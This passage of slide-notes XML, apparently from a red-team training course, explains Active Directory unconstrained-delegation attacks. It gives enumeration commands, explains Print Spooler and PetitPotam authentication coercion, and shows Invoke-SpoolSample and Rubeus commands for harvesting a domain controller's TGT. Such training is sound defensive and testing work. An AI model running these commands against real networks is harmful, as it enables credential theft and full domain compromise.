              <a:t>The results of this search will always have the domain controller in there, as domain controllers are required to have unconstrained delegation, or they won't work (useful to know for later in this section).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\&gt;([adsisearcher]'(&amp;(objectcategory=computer)((userAccountControl:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.2.840.113556.1.4.803:=524288)))').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FindAll</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GetDirectoryEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() | Select-Object -Property *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#PowerView</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\&gt; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DomainComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Unconstrained</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#SharpView</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\&gt; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DomainComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Unconstrained</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321141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5B71-BCA1-7EC6-675E-C9047896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3F586-5BE6-2F2E-89D8-6BF61C6D30E1}"/>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7AB2ADC9-D355-08E2-2D6A-AF24317D2281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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B720B4EE-D722-68B9-66BC-39C6BA2D44BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2261063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If we can compromise a computer with unconstrained delegation, we, therefore, compromise all users that have their TGT cached on the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we are lucky, there are some high privileged users that have authenticated to the system. But would it not be cool if we could "force" interesting accounts to authenticate to us? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As it turns out, we can do just that.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1741264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At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>DerbyCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> 2018, Lee Christensen, Will Schroeder, and Matt Nelson presented their findings on research they conducted with regard to security descriptors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Part of that research identified a "won't fix" security vulnerability ("feature," according to Microsoft), where any authenticated user could trigger an RPC call to remote systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This RPC call belongs to the MS-RPRN (Print System Remote Protocol). By making the RPC call, it is possible to force a system to authenticate back to an arbitrary system over SMB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>As you can imagine, this is a disaster if an attacker has control over an unconstrained delegation system, as we can harvest TGTs of these machines that have been forced to authenticate to us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1380873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b="0" dirty="0"/>
              <a:t>Much like the folks of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>SpecterOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> did in 2018, a researcher called Gilles Lionel surprised the infosec world with another way of forcing authentication to an arbitrary machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This time, it was not the printer RPC call but the encrypting file system remote protocol (MS-EFSRPC). With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, it is possible to send a multitude of API calls to a system, which will trigger an authentication back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The finding was even worse than the printer finding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>SpecterOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, as initially, it was possible to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> from a completely unauthenticated point of view.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Microsoft realized this was a major issue and released a patch that got rid of the unauthenticated vulnerability and one of the API calls. Unfortunately, to this day, it is still possible to trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> from an authenticated perspective, even on the most up-to-date systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The only defense that completely mitigates the risk is either implementing RPC filtering or blocking the RPC calls in the firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>https://github.com/topotam/PetitPotam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>https://twitter.com/gentilkiwi/status/1421949715986403329</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352272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We have already discussed that if a machine is configured for unconstrained delegation, the TGTs will get cached inside the server's memory. If we combine this knowledge with Print Spooler or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we are able to abuse this functionality to force domain controllers (or other interesting assets) to connect to us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Afterward, we can harvest their TGTs, effectively compromising them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2802944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Using Rubeus on a system with unconstrained delegation in high integrity, we can monitor for new incoming TGTs and harvest them straight from memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Combined with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpoolSample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, this is deadly as it leads to full domain compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\ Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpoolSample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "dc01.asgard.corp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cserver.asgard.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\Rubeus.exe monitor /targetuser:DC01$ /interval:5</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2959723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Empire has no support for running tasks like this in the background. As a result, executing unconstrained delegation attacks from Empire is unfeasible. The command will simply hang your agent indefinitely, making you lose your valuable implant in the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The only workaround would be using the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>runfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> switch in Rubeus and piping the output of Rubeus to a file. This would touch disk and is not very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-safe.</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" b="1"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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325884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D18BC-A63B-5AD2-8611-03D7E1BD4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B6404-F371-C068-F571-853E9FD23C0E}"/>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13C4A9CE-8C06-9A3E-B200-237DE07BD6BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This area is intentionally left blank.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3F39E8-4C45-E174-6150-2957B9442F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3784873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71A94-1A9F-A46B-5830-AEEBCF833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66E21-B9A7-8014-D03D-9CA2868A83C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296863" y="331788"/>
            <a:ext cx="6721475" cy="3781425"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A6A696-3250-4246-B392-63018464C420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6FB182-FE7B-8E03-DB29-4F3F0B4434F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715197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algn="l">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Jean-François </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Maes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jean-François is based in Portugal where he is the European director of advanced assessment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Neuvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, specializing in internal penetration testing as well as red teaming and adversary emulation and simulation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prior to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Neuvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Jean-Francois worked for other noteworthy firms, including, but not limited to, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TrustedSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fortra's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cobalt-Strike team, and NVISO.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>He is a strong believer in open source and an avid contributor to the offensive security community. Jean-François is currently teaching SANS course SEC699: Advanced Purple Teaming - Adversary Emulation &amp; Detection Engineering and is the lead author of SEC565: Red Team Operations and Adversary Emulation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>David Mayer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dave is the Managing Director of Advanced Assessments and CIO for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Neuvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
